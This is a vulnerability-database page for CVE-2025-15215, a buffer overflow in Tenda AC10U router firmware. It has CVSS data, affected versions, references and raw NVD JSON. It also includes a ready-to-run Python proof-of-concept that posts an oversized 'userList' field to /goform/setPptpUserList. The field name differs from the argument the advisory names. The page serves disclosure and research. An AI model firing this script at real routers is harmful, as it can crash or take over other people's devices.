Security Vulnerability Report
中文
CVE-2025-15215 CVSS 8.8 HIGH

CVE-2025-15215

Published: 2025-12-30 03:15:51
Last Modified: 2026-01-02 21:28:56
Source: [email protected]

Description

A vulnerability was determined in Tenda AC10U 15.03.06.48/15.03.06.49. This affects the function formSetPPTPUserList of the file /goform/setPptpUserList of the component HTTP POST Request Handler. This manipulation of the argument list causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ac10u_firmware:15.03.06.48:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:ac10u:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tenda:ac10u_firmware:15.03.06.49:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:ac10u:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda AC10U 15.03.06.48
Tenda AC10U 15.03.06.49

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-15215 PoC - Tenda AC10U setPptpUserList Buffer Overflow This PoC demonstrates the buffer overflow vulnerability in Tenda AC10U routers. Note: Use only for authorized security testing. """ import requests import sys import argparse def exploit(target_ip, target_port=80): """ Exploit the buffer overflow in formSetPPTPUserList function """ url = f"http://{target_ip}:{target_port}/goform/setPptpUserList" # Buffer overflow payload - causes overflow in parameter handling # Pattern designed to overflow buffer and potentially control execution overflow_payload = "A" * 1000 # Construct malicious POST data data = { "userList": overflow_payload, "page": "1", "pageSize": "20" } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } try: print(f"[*] Sending exploit payload to {target_ip}:{target_port}") print(f"[*] Payload length: {len(overflow_payload)} bytes") response = requests.post(url, data=data, headers=headers, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.text)} bytes") if response.status_code == 200: print("[+] Exploit sent successfully - device may be vulnerable") else: print("[*] Unexpected response code") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False return True if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-15215 PoC") parser.add_argument("-t", "--target", required=True, help="Target IP address") parser.add_argument("-p", "--port", type=int, default=80, help="Target port (default: 80)") args = parser.parse_args() exploit(args.target, args.port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15215", "sourceIdentifier": "[email protected]", "published": "2025-12-30T03:15:50.733", "lastModified": "2026-01-02T21:28:56.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Tenda AC10U 15.03.06.48/15.03.06.49. This affects the function formSetPPTPUserList of the file /goform/setPptpUserList of the component HTTP POST Request Handler. This manipulation of the argument list causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac10u_firmware:15.03.06.48:*:*:*:*:*:*:*", "matchCriteriaId": "1C2AFD04-833D-4085-BAD6-32A2715FA785"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac10u:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "6D74EB31-E01D-439E-AAEC-BF0D4965A097"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac10u_firmware:15.03.06.49:*:*:*:*:*:*:*", "matchCriteriaId": "0F101E88-BEA9-4017-9048-860DF3D1BBBC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac10u:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "6D74EB31-E01D-439E-AAEC-BF0D4965A097"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.338600", "source": "[email protected]", "tags": ["VDB Entry"]}, {"url": "https://vuldb.com/?id.338600", "source": "[email protected]", "tags": ["VDB Entry"]}, {"url": "https://vuldb.com/?submit.725365", "source": "[email protected]", "tags": ["VDB Entry"]}, {"url": "https://www.notion.so/Tenda-AC10U-setPptpUserList-2d753a41781f80e8ba6bc37ba6100343?pvs=73", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.